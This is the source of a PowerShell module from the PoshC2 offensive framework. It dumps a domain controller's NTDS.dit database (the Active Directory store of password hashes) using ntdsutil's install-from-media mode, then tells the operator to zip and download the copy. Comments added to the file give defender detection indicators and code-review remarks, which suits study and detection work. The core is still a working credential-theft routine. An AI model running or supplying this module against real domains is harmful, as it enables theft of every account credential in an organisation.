PoshC2_Python/Modules/Dump-NTDS.ps1


<#
.Synopsis
Dumps the Active Directory NTDS.dit database using ntdsutil
.DESCRIPTION
Dumps the Active Directory NTDS.dit database using ntdsutil
.EXAMPLE
PS C:\>Dump-NTDS -EmptyFolder C:\Temp\NTDS\
#>
function Dump-NTDS
{
# Exports a copy of the domain controller's NTDS.dit into $EmptyFolder via
# ntdsutil's "ifm" (install-from-media) mode. Requires an elevated session
# (see Test-Administrator). Produces no return value; all status is written
# to the output stream with Write-Output.
#
# Defender note: ntdsutil.exe is a signed, built-in DC tool, so the command
# line ("ifm" / "create full") rather than the image is the useful indicator.
# Process-creation auditing with command-line capture (Security 4688 with
# command line included, or Sysmon Event ID 1) on domain controllers records
# this invocation, and the DC's Application log typically records the ESENT
# database copy being created.
[cmdletbinding()]
Param
(
# NOTE(review): declared [string[]] but interpolated as a single path below;
# a multi-element array would be joined with $OFS (a space) into one argument.
[string[]]$EmptyFolder
)
# NOTE(review): if $EmptyFolder does not exist, Get-ChildItem emits a
# non-terminating error and yields nothing, so Count is 0 and the dump is
# still attempted — a Test-Path check first would close that gap.
if( (Get-ChildItem $EmptyFolder | Measure-Object).Count -eq 0)
{
if (Test-Administrator) {
# Each quoted string is one ntdsutil argument; the trailing space inside
# "create full $($EmptyFolder) " is passed through as part of that argument.
NTdsutil.exe "activate instance ntds" "ifm" "create full $($EmptyFolder) " "q" "q"
} else {
# Failure is reported on the output stream, not the error stream, so a
# caller cannot tell it from success by stream or exit status.
Write-Output "Not running in elevated mode - must run as administrator"
}
} else {
Write-Output "Folder is not empty, must use an empty folder"
}
# Printed unconditionally, even when no dump was attempted. ("successfull" is
# a typo in the runtime message; left unchanged here as it is program output.)
Write-Output "If successfull, Zip the files and download using - New-ZipFile c:\temp\test.zip c:\temp\test\"
}
function Test-Administrator
{
# Returns $true when the calling token holds the built-in Administrators role.
# Under UAC a non-elevated session of an admin user reports $false, because
# the Administrators SID is deny-only on the filtered token.
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
$adminRole = [Security.Principal.WindowsBuiltinRole]::Administrator
return $principal.IsInRole($adminRole)
}